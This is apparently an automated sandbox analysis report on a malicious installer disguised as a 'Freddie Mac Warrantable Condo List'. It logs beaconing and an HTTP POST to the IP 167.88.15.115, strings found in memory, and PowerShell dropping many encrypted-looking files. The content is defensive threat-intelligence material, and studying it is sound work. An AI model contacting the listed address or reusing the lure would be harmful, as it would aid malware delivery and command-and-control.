Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115
Source: unknown	TCP traffic detected without corresponding DNS query: 167.88.15.115

Source: Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: powershell.exe, 0000000B.00000002.404796780.0000000000E26000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: powershell.exe, 0000000A.00000002.403581267.0000000004CF1000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.405501302.0000000004D51000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://subca.ocsp-certum.com01
Source: Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.certum.pl/CPS0
Source: powershell.exe, 0000000B.00000002.437088774.0000000007A1C000.00000004.00000001.sdmp	String found in binary or memory: http://www.microsoft.coT
Source: Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: https://jrsoftware.org/
Source: Freddie-Mac-Warrantable-Condo-List.exe	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: Freddie-Mac-Warrantable-Condo-List.exe, 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: https://jrsoftware.org0
Source: Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000003.305669485.00000000037B2000.00000004.00000001.sdmp	String found in binary or memory: https://www.certum.pl/CPS0
Source: Freddie-Mac-Warrantable-Condo-List.exe, 00000001.00000003.255111347.000000007FB50000.00000004.00000001.sdmp, Freddie-Mac-Warrantable-Condo-List.tmp, Freddie-Mac-Warrantable-Condo-List.tmp, 00000005.00000000.257520035.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: https://www.innosetup.com/
Source: Freddie-Mac-Warrantable-Condo-List.exe, 00000001.00000003.255111347.000000007FB50000.00000004.00000001.sdmp, Freddie-Mac-Warrantable-Condo-List.tmp	String found in binary or memory: https://www.remobjects.com/ps

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Host: 167.88.15.115Content-Length: 401Connection: Keep-Alive

Spam, unwanted Advertisements and Ransom Demands:

Writes many files with high entropy

Show sources

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\qdWyiuOhFVCkzKjv.OJzpTlMGcQav entropy: 7.99803156534	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hUsfqNadGZ.hKnxVlyqQWMLPieGF entropy: 7.99735688407	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\leODoNBzGaTbiPsc.dXxMCqQBZWkw entropy: 7.99665662436	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\wXkhnqOzxyHdvUWEBbS.ovwNVSdlhPntZ entropy: 7.99840729701	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\ieURGnTmlZWKpkYrcu.HgcoWfqXMIw entropy: 7.99892103118	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\VHghDoceFsG.HNhPgvIKEpoOYR entropy: 7.99892276893	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\AYZutSJyoh.NfrEmbKigQsDGMYBqF entropy: 7.99645948058	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\jHhxkmzcKIiOb.goRYkOBrtadJEI entropy: 7.99880431708	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hlHBxDUXTqb.hLQXuPwUSeIyROVc entropy: 7.99905693141	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\BwfYvVCqAGOkJSgT.hxvQyPIopOKCmgNRFW entropy: 7.99900315274	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\IpwGhCnVEmKNs.FafghKUwOuzkqLDjWo entropy: 7.99764174873	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\klpgDZItxRGwehcuA.wqxWrudDTltHN entropy: 7.99882042103	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\lDhgBpdXGP.GrLnIePcdiVTR entropy: 7.99837960293	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\YkIpmuylNLPA.UwxRGKOsBVgkhCZT entropy: 7.99790987879	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\RpTbSfhcWgVE.ksIJLSKcpOGA entropy: 7.99859723782	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\BIWiHudEqJMsDyPngz.rMfODTVEPdJokwQA entropy: 7.99854300719	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\vJEPDwSdOAruHCf.hoeuiPUEHjNI entropy: 7.99727801282	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\GBcjDUifud.OxVZwkPCdBRiXFcqUo entropy: 7.99812304232	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\XkpsiyquBfQOJomWVSb.TQoVmyrCziLJjv entropy: 7.99898798788	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\puembgBHRLv.ptgvIKAqlDPxSJZXVE entropy: 7.99871741037	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\HCZtzBgSEKUIxy.pFsTynBxcaSUEqzQLvh entropy: 7.9967505186	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hMXRCujOwlAymN.PGuyfsOSomYN entropy: 7.99840672501	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\bdyzoGHUekK.hDHSQzRiMmEtleJ entropy: 7.99864409779	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\NzgXIrwMfQPoJWFakOu.ebBSyrmFCOhwR entropy: 7.99880271212	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\eNpjSAzFQnbKsc.RpAHXSVaGwIB entropy: 7.99879286557	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\mXrYpGVCRolKMyFIZeg.RuyvwrWOZKzdg entropy: 7.99798761773	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\QViZhqFrkYxUbwtjs.AfnrkbFHlJIQmjg entropy: 7.99894122401	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\rtIfzbxAeCukFph.maXIOyjYWAFQDHNZt entropy: 7.99880920236	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\IuEPiQpokBgY.cwVJkRoCDvX entropy: 7.99894084144	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\yKVnfarwMO.oaeIAXKznvhZUlP entropy: 7.99861447399	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\NQaTsHuKpLcfEkw.qXIGPwJZRUnvW entropy: 7.99852769214	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\SRzDIgufWpxvsG.QpoBgwbCXilRhSkvtV entropy: 7.99906749269	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\RYeicyKBsxuqzCbTlmF.NbdeOVtjPKHlWphknca entropy: 7.99906862295	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\OkdgDRzXGLTKxQcnr.ZeAYyzqFLjw entropy: 7.99831300624	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hsafHjXxuEDUqoniWy.bvRkoZsXrnhT entropy: 7.99881601021	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\kpTXHNogYaW.eKgcqpzOrTwakSJ entropy: 7.99832493798	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\HzjGFEaWXANUlhi.nOgbPVBRLoK entropy: 7.99740155916	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\yNBfjEqmKZXtVkOlwIz.GSaQEmuiYWNZjRlnspJ entropy: 7.99824296179	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\WDZBQvdYspbNUcGaL.sJStYkmKzTH entropy: 7.99843277945	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\zEdtUMvTylPsZrW.TVKGRBrpstHAmbfPWO entropy: 7.9989013469	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\UjrzbuFnoRIVTLSKXHA.zQGctwxhnarFR entropy: 7.99905866435	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\wKlguLnFVbZNShYjprA.wDGbgRtmJuIlXNW entropy: 7.99887400364	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\qnVzZGgruf.EJwAxkHGVP entropy: 7.99822800928	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\BOkHbjCXlPxTtW.IDJSCGETVFmUXYsbWd entropy: 7.99665216429	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\tskywKHRGqhu.osSCvgPNDGrjHK entropy: 7.99790347249	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\uOfsZbLFXYzQPTiR.uvJsIVOiyfEbpMSk entropy: 7.99791026273	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\BqcKXRDrZxbzksaJF.hNioXuZeYA entropy: 7.99908392464	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\LpsrUIEbMNhHu.cNRBMkGIvhsTS entropy: 7.99883976915	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\aisZXhvHPOwrmlFpfcU.wKCpWYBgsmFRt entropy: 7.99910855483	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\nxPNgKjsDlqTdhCk.qzPiXulaygOGreVSUmx entropy: 7.99745086935	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\JMTGHiavKcWDFZebl.nxFXMSPduJKcmpzsfe entropy: 7.99794846433	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\ABIsmoHiRLGZfKpt.saIBcKtnCZfHhqyomGT entropy: 7.99898748714	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\thIyUJBgrDZ.ByoVZGPmwzRAsMeq entropy: 7.99855976119	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\GoZrhXvmKqjDgOFbLJC.YjXregzImwALOMqiHTN entropy: 7.99706915987	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\ZGNuKwPLhofnDrOT.ErniRtpaAhPUT entropy: 7.99844498285	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\zlsFRCoiMYPGIJhV.RASlniKYZa entropy: 7.99818631065	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\HFtjDvUoNScdVEKi.QsBTLprfiEycUwVC entropy: 7.99822712061	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\SqtfjTWkhVyEKDNMa.EQFTNWbKwiMyzRBZm entropy: 7.99870503311	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\LoiyfTFKdXhmGbapI.NldCrYQkRM entropy: 7.99673611612	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\jmGuOcMCkqWFXUZYwa.BGaLyxeDdVnvg entropy: 7.99764158401	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\iqyWDrjapTfvERXgQ.HxUZrvwDOezbVJoN entropy: 7.99896627158	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\UoRzTebkDwpOsaflhW.RyQzHhgvZNoXfaUe entropy: 7.99902141063	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\KRnUxTrWSBjXJwazZd.ORpCBPWDkyzoNr entropy: 7.99644807842	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\tjGlCVFmuniRcvYBNS.vgKplCsmWkGH entropy: 7.99883385975	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\XGDnpNlmCvqQaOMLt.lJXIxpTOqNMjw entropy: 7.9979216328	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\huMidgcwOmveyRlEjAo.DRhwnzugrvie entropy: 7.99774131172	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\bEUNujtkyH.GRbKPHQcmkrjg entropy: 7.99862506879	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\ScIKulPoBVtjnfDxQTF.OcoEDWhSkHTpq entropy: 7.99876315612	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\QPERshlVgOv.pdqlngwktfIDyHj entropy: 7.99841497892	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\nGrySpmMqVxJX.kBMYDexpsfrXcSIH entropy: 7.99777730158	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\sjSUupZbieHn.NLamXBCwgrf entropy: 7.99893221304	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\YdykENuflJnmx.HDhgRGrkmy entropy: 7.99888561671	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\EGidmUOVPrKh.gekSCYTBVFLNbaXmAwt entropy: 7.99868729466	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\vVFBEQOPsq.cPplmezafFLEA entropy: 7.99888101256	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\tDilKLmVRNWnXZcYrS.XuaEpJKnWD entropy: 7.99663524865	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\HxquFgyDwYAQJzr.HbdNoeGjmKT entropy: 7.99670543748	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\HAxTXpsGnEblfijKeLI.rlYvwjxUGHC entropy: 7.99884621772	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\VDsefFSmIJH.gNhpnMYTiyZ entropy: 7.99902303935	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\XrFMbICTPLQJwB.uqXUPEjfvS entropy: 7.99732238442	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\ulnWTOLiYM.buMDFIqpBse entropy: 7.99885274809	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\yzvlHOZsjpGrQSFVnie.lwceDMzFGgp entropy: 7.99761672717	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\guHsdjwxzUfcvOkC.pobQxMgAswRz entropy: 7.99826135775	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\arftDKGNyB.GMQpowHvgBNLha entropy: 7.99869503268	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\LQseJUBkYz.pFOuCVwicoZavsR entropy: 7.99895361866	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\tdhHyzrioAPWpJk.JrajoNHidsXnIChLqU entropy: 7.99912794308	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\evPHQcahCdxyIltEsZ.uUmEaIqixpsDQwV entropy: 7.9990479559	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\XPdZORVTUyhqJEgwj.wFBdSbZJhgcKV entropy: 7.99729072755	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\sRMtvhOdibu.XGqDaIYhSbevCQU entropy: 7.99909457624	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\LSypsfMjuHPWV.QNmGCKxUusfy entropy: 7.99811309939	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\ufBWJYvRASCGNXlz.PsnVrajykw entropy: 7.99862707581	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\rGoHwmlvfadigxj.rIeUpOXfoltbL entropy: 7.99850624603	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\GLkArebBzPJ.aHbVgKEWAMQ entropy: 7.99818615526	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\swncKuMZhNtO.EUShkCzacdWqJLgHOw entropy: 7.99804629054	Jump to dropped file
